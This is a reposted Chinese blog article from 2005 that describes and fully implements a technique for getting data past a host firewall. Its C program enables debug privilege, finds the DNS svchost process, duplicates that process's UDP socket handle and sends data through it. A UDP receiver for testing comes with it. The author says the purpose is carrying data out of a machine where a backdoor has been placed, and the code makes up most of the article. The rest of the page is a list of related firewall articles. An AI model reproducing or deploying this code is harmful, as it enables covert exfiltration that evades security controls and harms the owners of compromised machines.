转:新的穿防火墙技术

最新推荐文章于 2024-06-04 16:36:12 发布
最新推荐文章于 2024-06-04 16:36:12 发布
阅读量947 收藏
点赞数
文章标签: 防火墙 socket null dll service token
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/checka/article/details/354051
版权
一种新的穿透防火墙的数据传输技术 创建时间:2005-04-13 更新时间:2005-04-13 文章属性:原创 文章提交:suei8423 (suei8423_at_163.com) 一种新的穿透防火墙的数据传输技术 Author : ZwelL Email : zwell@sohu.com Date : 2005.4.12 使用该技术背景: 在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么). 针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦. 相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单: 将其他进程中允许数据传输的套接字句柄拿为已用.过程如下: 1. 找出目标进程 2. 找出SOCKET句柄 2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用. 3. 用转换后的SOCKET进行数据传输 上面的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也 可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP. 针对不同系统不同进程我们很难定位一个稳定的进程SOCKET. 看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的"黄金大道". 我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被 拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀... 下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子. 编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等. 具体解决方法请细看注释部分... /*++ Made By ZwelL zwell@sohu.com 2005.4.12 --*/ #include #include #include #pragma comment(lib, "ws2_32") #pragma comment(lib, "wtsapi32") #define NT_SUCCESS(status) ((NTSTATUS)(status)>=0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) typedef LONG NTSTATUS; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG); ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL; BOOL LocateNtdllEntry ( void ) { BOOL ret = FALSE; char NTDLL_DLL[] = "ntdll.dll"; HMODULE ntdll_dll = NULL; if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL ) { printf( "GetModuleHandle() failed"); return( FALSE ); } if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) ) { goto LocateNtdllEntry_exit; } ret = TRUE; LocateNtdllEntry_exit: if ( FALSE == ret ) { printf( "GetProcAddress() failed"); } ntdll_dll = NULL; return( ret ); } /*++ This routine is used to get a process's username from it's SID --*/ BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName) { // sanity checks and default value if (pUserSid == NULL) return false; strcpy(szUserName, "?"); SID_NAME_USE snu; TCHAR szUser[_MAX_PATH]; DWORD chUser = _MAX_PATH; PDWORD pcchUser = &chUser; TCHAR szDomain[_MAX_PATH]; DWORD chDomain = _MAX_PATH; PDWORD pcchDomain = &chDomain; // Retrieve user name and domain name based on user's SID. if ( ::LookupAccountSid( NULL, pUserSid, szUser, pcchUser, szDomain, pcchDomain, &snu ) ) { wsprintf(szUserName, "%s", szUser); } else { return false; } return true; } /*++ This routine is used to get the DNS process's Id Here, I use WTSEnumerateProcesses to get process user Sid, and then get the process user name. Beacause as it's a "NETWORK SERVICE", we cann't use OpenProcessToken to catch the DNS process's token information, even if we has the privilege in catching the SYSTEM's. --*/ DWORD GetDNSProcessId() { PWTS_PROCESS_INFO pProcessInfo = NULL; DWORD ProcessCount = 0; char szUserName[255]; DWORD Id = -1; if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount)) { // dump each process description for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++) { if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 ) { GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName); if( strcmp(szUserName, "NETWORK SERVICE") == 0) { Id = pProcessInfo[CurrentProcess].ProcessId; break; } } } WTSFreeMemory(pProcessInfo); } return Id; } /*++ This doesn't work as we know, sign... but you can use the routine for other useing... --*/ /* BOOL GetProcessUserFromId(char *szAccountName, DWORD PID) { HANDLE hProcess = NULL, hAccessToken = NULL; TCHAR InfoBuffer[1000], szDomainName[200]; PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer; DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200; SID_NAME_USE snu; hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID); if(hProcess == NULL) { printf("OpenProcess wrong"); CloseHandle(hProcess); return false; } if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken)) { printf("OpenProcessToken wrong:%08x", GetLastError()); return false; } GetTokenInformation(hAccessToken,TokenUser,InfoBuffer, 1000, &dwInfoBufferSize); LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName, &dwAccountSize,szDomainName, &dwDomainSize, &snu); if(hProcess) CloseHandle(hProcess); if(hAccessToken) CloseHandle(hAccessToken); return true; }*/ /*++ Now, it is the most important stuff... ^_^ --*/ SOCKET GetSocketFromId (DWORD PID) { NTSTATUS status; PVOID buf = NULL; ULONG size = 1; ULONG NumOfHandle = 0; ULONG i; PSYSTEM_HANDLE_INFORMATION h_info = NULL; HANDLE sock = NULL; DWORD n; buf=malloc(0x1000); if(buf == NULL) { printf("malloc wrong/n"); return NULL; } status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n ); if(STATUS_INFO_LENGTH_MISMATCH == status) { free(buf); buf=malloc(n); if(buf == NULL) { printf("malloc wrong/n"); return NULL; } status = ZwQuerySystemInformation( 0x10, buf, n, NULL); } else { printf("ZwQuerySystemInformation wrong/n"); return NULL; } NumOfHandle = *(ULONG*)buf; h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4); for(i = 0; i 0) // if port > 0, then we can use it break; } } catch(...) { continue; } } if ( buf != NULL ) { free( buf ); } return (SOCKET)sock; } /*++ This is not required... --*/ BOOL EnablePrivilege (PCSTR name) { HANDLE hToken; BOOL rv; TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} }; LookupPrivilegeValue ( 0, name, &priv.Privileges[0].Luid ); priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; OpenProcessToken( GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, &hToken ); AdjustTokenPrivileges ( hToken, FALSE, &priv, sizeof priv, 0, 0 ); rv = GetLastError () == ERROR_SUCCESS; CloseHandle (hToken); return rv; } void main() { WSADATA wsaData; char testbuf[255]; SOCKET sock; sockaddr_in RecvAddr; int iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != NO_ERROR) printf("Error at WSAStartup()/n"); if(!LocateNtdllEntry()) return; if(!EnablePrivilege (SE_DEBUG_NAME)) { printf("EnablePrivilege wrong/n"); return; } sock = GetSocketFromId(GetDNSProcessId()); if( sock==NULL) { printf("GetSocketFromId wrong/n"); return; } //Change there value... RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(5555); RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1"); if(SOCKET_ERROR == sendto(sock, "test", 5, 0, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr))) { printf("sendto wrong:%d/n", WSAGetLastError()); } else { printf("send ok... Have fun, right? ^_^/n"); } getchar(); //WSACleanup(); return; } 很早以前我就有这个想法了,只是一直没有去实现.在上面的代码中, 因为要找出DNS进程句柄,而svchost.exe又有多个,所以以用户名来进行判断,本来是用OpenProcessToken, 但是怎么也不行,所以换个方法.用到了wtsapi32库函数. 再用下面的代码测试: /*++ UdpReceiver --*/ #include #include "winsock2.h" #pragma comment(lib, "ws2_32") void main() { WSADATA wsaData; SOCKET RecvSocket; sockaddr_in RecvAddr; int Port = 5555; char RecvBuf[1024]; int BufLen = 1024; sockaddr_in SenderAddr; int SenderAddrSize = sizeof(SenderAddr); //----------------------------------------------- // Initialize Winsock WSAStartup(MAKEWORD(2,2), &wsaData); //----------------------------------------------- // Create a receiver socket to receive datagrams RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); //----------------------------------------------- // Bind the socket to any address and the specified port. RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(Port); RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY); bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr)); //----------------------------------------------- // Call the recvfrom function to receive datagrams // on the bound socket. printf("Receiving datagrams.../n"); while(1) { recvfrom(RecvSocket, RecvBuf, BufLen, 0, (SOCKADDR *)&SenderAddr, &SenderAddrSize); printf("%s/n", RecvBuf); } //----------------------------------------------- // Close the socket when finished receiving datagrams printf("Finished receiving. Closing socket./n"); closesocket(RecvSocket); //----------------------------------------------- // Clean up and exit. printf("Exiting./n"); WSACleanup(); return; } 测试步骤: 1. 在一台机器上执行UdpReceiver, 2. 在安装防火墙的机器上执行第一个程序.
checka
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
防火墙技术学习笔记一
tao546377318的博客
11-30 1万+
第一章:基础知识 1.1 什么是防火墙       防火墙,顾名思义阻挡的是火,这一名词起源于建筑领域,其作用是隔离火灾,阻止火势从一个区域蔓延到另一个区域。这种隔离是高明的,隔离的是“火”的蔓延,其中的“火”指的是各种攻击,而又保证了“人”能穿墙通过,其中的“人”指的是通信报文。用通信的语言来定义是:防火墙主要用于保护一个网络免受来自另一个网路的攻击和入侵。因其隔离,防守的属性,防火
几种穿防火墙技术
mobile payment development
07-12 1040
本人对几种穿防火墙技术 以下是本人对几种穿透技术学习笔记和一点自己的想法: 防火墙是基本网络安全策略之一,它可以阻止不信任的外部网络用户对内部网络用户的访问,如果外网用户同内网用户之间的通信由外网用户发起,通信通常会被防火墙阻断,尤其是对TCP连接敏感,因此我们如果才能保证正常的数据传输呢,特别是非主动连接情况下,怎么保证连接和数据通信的安全稳定性呢? 人们使用穿防火墙技术(常用): ...
防火墙技术及应用(一)
浮云渐渐
03-21 6191
防火墙的基本概念 防火墙就是一组能够实现安全策略,能够对进出的通信流或者信息流进行控制的一种设备。它可以是装配多张网卡的通用计算机,也可能是通用的物理设备。 防火墙(Firewall)是用一个或一组网络设备(计算机系统或路由器等)  在两个或多个网络间加强访问控制,以保护一个网络不受来自另 一个网络攻击的安全技术。  防火墙作为外部网络数据进入内部网络数据的唯一出入口,能根据企业的访问控制策略...
穿防火墙技术
逐渐成长
03-12 2830
最近看了几篇关于穿防火墙技术的论文,发现其中有两篇很值得学习下,一篇是介绍p2技术的,另一篇是基于反向连接 HTTP隧道和DNS共享穿防火墙技术,对于P2技术不太熟悉,主要小节下后面三中穿防火墙技术吧 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站0 q, U6 Z- {- ^& K5 m& ?$ A         在网络安全防护中,防火墙是首选的安全设备
防火墙——基本知识
bingshanzhu的专栏
06-24 2007
防火墙 一种高级访问控制设备,置于不同网络安全域之间的一系列部件的组合,它是不同网络安全域间通信流的唯一通道,能根据企业有关的安全政策控制(允许、拒绝、监视、记录)进出网络的访问行为 防火墙的作用 过滤进出网络的数据包 管理进出网络的访问行为 封堵某些禁止的访问行为 记录通过防火墙的信息内容和活动 对网络攻击进行检测和告警 能过滤大部分的危险端口 设置严格的外向内的状态过滤规则 抵挡大部分的拒绝...
防火墙技术
ldongwei的专栏
05-12 405
防火墙技术专题   评论:0 条   查看:158 次   linuxsun 发表于 2008-12-10 12:13 创建时间:2003-06-04文章属性:原创文章提交:liwrml (liwrml_at_vertarmy.org)作者:liwrml Internet的迅
强悍-防火墙边界防范的根本作用-详细黑客自学
程序员六七的博客
06-04 517
防火墙上可以指定规则,允许内网 10.1.1.0/24 网段的 PC 访问 Internet ,禁止 Internet 用户访问 IP 地址为
防火墙的起源与发展
乘风丶破浪的博客
03-04 8152
防火墙,顾名思义,阻挡的是火,此词起源于建筑领域,正是用来隔离火灾,阻止火势从一个区域蔓延到另一个区域。 引入到通信领域,防火墙也正是形象化地体现了这一特点:防火墙这一具体设备,通常用于两个网络之间的隔离。当然,这种隔离是高明的,隔离的是“火”的蔓延,而又保证“人”的穿墙而过。这里的“火”是指网络中的各种攻击,而“人”是指正常的通信报文。那么,用通信语言来定义,防...
防火墙基本概念
weixin_59280309的博客
04-02 1760
什么是防火墙: 1992年经合组织发布了信息安全指导书,被后世称之为安全黄金三角的CIA的理念被提出,所谓 CIA指的是机密性(confidentiality)、完整性(integrity)、可用性(availability)。
防火墙施工技术交底.docx
11-10
防火墙施工技术交底是确保建筑工程中防火墙建设质量的重要环节。防火墙是建筑结构中的关键部分,主要用于隔绝火源,防止火灾蔓延,保障人员安全和财产安全。以下是防火墙施工过程中的主要知识点: 1. **设计要求**...
通信与网络中的ICE: VoIP穿墙术
12-08
 目前有许多种解决方案都可以让基于SIP的VoIP呼叫穿防火墙,但每一种类型的NAT防火墙都要求使用不同的技术。另外,每种NAT穿透解决方案只适用于一种类型的NAT设备,这也使事情 变得更复杂。例如, 简单UDP...
电缆桥架及风管穿防火墙(楼板)施工工法.pdf
11-04
电缆桥架及风管穿防火墙(楼板)施工工法.pdf
油罐清洗安全技术方案.docx
10-02
- **电气设备安全**:在防火墙内使用的电气机器和工具必须是耐压防爆的。 - **防止H2S中毒**:拆罐顶支柱、罐壁人孔等作业时,需办理安全作业票。 - **起重作业安全**:严格执行相关规定,确保吊装作业安全。 - **...
化纤产成品仓库安全技术要求.docx
10-01
7. **办公区域**:库房内不宜设置休息室或办公室,若必须设置,则应通过防火墙与其他区域隔离。 #### 三、重点部位的安全技术 ##### (一) 保管安全技术规则 1. **明火管理**:建立严格的明火管理制度,确保库区内...
传感器驱动+imx296驱动+Linux驱动
08-10
传感器驱动+imx296驱动+Linux驱动
ASP校园论坛的设计与实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
Unity课程设计报告书PDF
最新发布
08-10
1.技术需求: 此游戏是在Unity5.3.3上开发出来的,Unity5.3.3可以支持2D、3D场景 的编辑,本游戏是基于3D场景开发的。游戏中的脚本语言使用的是C#, Unity5.3.3中的Monodevelop为脚本编辑提供了平台。 2.功能需求: Flappy Bird 是一款益智类的小游戏,其玩法为:游戏开始后,玩家需间歇 性的点击鼠标,让小鸟向上飞,不会掉下来,并且要穿过随机出现的管道的间隙, 不能碰到管道,碰到就游戏结束,穿过一个管道就可以得到一分。其制作包括对 以下六大功能的需求: (1)当开始游戏后,玩家需要单击指定位置才能开始游戏,否则无法开始: (2)需要通过点击屏幕来控制小鸟的位置,完成使小鸟上下移动的功能: (3)需要对小鸟是否碰到地面或者管道进行判断,从而决定游戏是否结束: (4)需要设置触发器以实现场景的延续,当小鸟碰到触发器,场景中的第一幅 背景便挪到最后一幅的后面,从而实现视觉上场景不断出现的效果: (5)需要对玩家进行记分,并对最高分进行判断和存储: (6)在失败后,需要使玩家通过点击按钮重开始游戏。
毕业设计,基于ASP+ACCESS开发的民航售票管理系统,内含完整源代码,数据库,毕业论文
08-10
毕业设计,基于ASP+ACCESS开发的民航售票管理系统,内含完整源代码,数据库,毕业论文 随着计算机及网络技术的飞速发展,Internet/Intranet应用在全球范围内日益普及,当今社会正快速向信息化社会前进,信息自动化的作用也越来越大。 从而使我们从繁杂的事务中解放出来,提高了我们的工作效率。 本论文主要阐述一个功能比较强大的企业网站系统的后台操作过程及一些关键技术。该系统信息来源主要由用户直接添加,通过管理员审核后,在网站上发布出来,以供大家查询相关公司信息。本系统主要让社会各界能更好的了解本本企业,欢迎对本企业的发展提出更多宝贵留言。该企业网站系统是前台应用Dreamweaver MX、FireworksMX、Flash MX等软件,后台结合ASP编程技术和Access数据库技术开发出来的。 关键词:用户管理;信息发布;ASP;企业网站
互联网安全基石:第四代防火墙技术详解与发展趋势
防火墙技术综述 随着互联网的快速发展,网络安全问题日益凸显,防火墙作为保护网络边界的关键组件,其重要性不言而喻。本文旨在深入探讨防火墙技术的发展历程,特别是第四代防火墙的演变及其在应对网络威胁方面的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值